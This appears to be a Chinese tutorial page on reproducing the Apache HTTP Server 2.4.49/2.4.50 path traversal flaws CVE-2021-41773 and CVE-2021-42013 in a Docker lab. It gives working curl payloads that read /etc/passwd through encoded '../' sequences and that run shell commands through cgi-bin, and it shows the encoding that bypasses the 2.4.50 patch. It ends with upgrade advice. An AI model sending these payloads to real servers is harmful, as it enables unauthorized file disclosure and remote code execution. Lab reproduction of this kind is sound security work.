栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

(环境搭建+复现)Apache CVE-2021-41773 && CVE-2021-42013系列漏洞复现

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

(环境搭建+复现)Apache CVE-2021-41773 && CVE-2021-42013系列漏洞复现

 0x00 简介

        Apache HTTP Server(HTTPd)是Apache软件基金会的一个开放源代码的网页服务器。

0x01 漏洞概述

Apache HTTP Server目录遍历漏洞CVE-2021-41773

        影响版本:Apache HTTP Server 2.4.49

        该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,攻击者利用该漏洞在未授权的情况下,访问服务器未在httpd配置文件中标记为拒绝请求的文件内容,进而导致敏感信息泄露。

Apache HTTP Server目录遍历漏洞CVE-2021-42013

        影响版本:Apache HTTP Server 2.4.50 & Apache HTTP Server 2.4.49        

        该漏洞是由于在Apache HTTP Server 2.4.50版本中对CVE-2021-41773修复不够完善,攻击者可利用该漏洞绕过修复补丁,并利用目录穿越攻击访问服务器中一些文件,进而造成敏感信息泄露。若httpd中开启CGI功能,攻击者可以构造恶意请求,造成远程代码执行。

0x02 环境搭建

​
1、git clone https://github.com/blasty/CVE-2021-41773.git

​2、docker-compose build && docker-compose up

0x03 漏洞利用

1、使用POC测试

curl -s --path-as-is "http://ip:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"

 2、使用EXP执行命令

curl -s --path-as-is -d 'echo Content-Type: text/plain; echo;whoami' "http://ip:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh"

3、CVE-2021-41773 cve-2021-42013的主要区别

把 /%2e/换成了/.%%32%65/从而绕过了Apache HTTP Server 2.4.50的补丁

 0x04 修复方式 

当前官方已发布最新版本,建议受影响的用户及时更新升级到最新版本。链接如下:

https://httpd.apache.org/download.cgi

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/312556.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号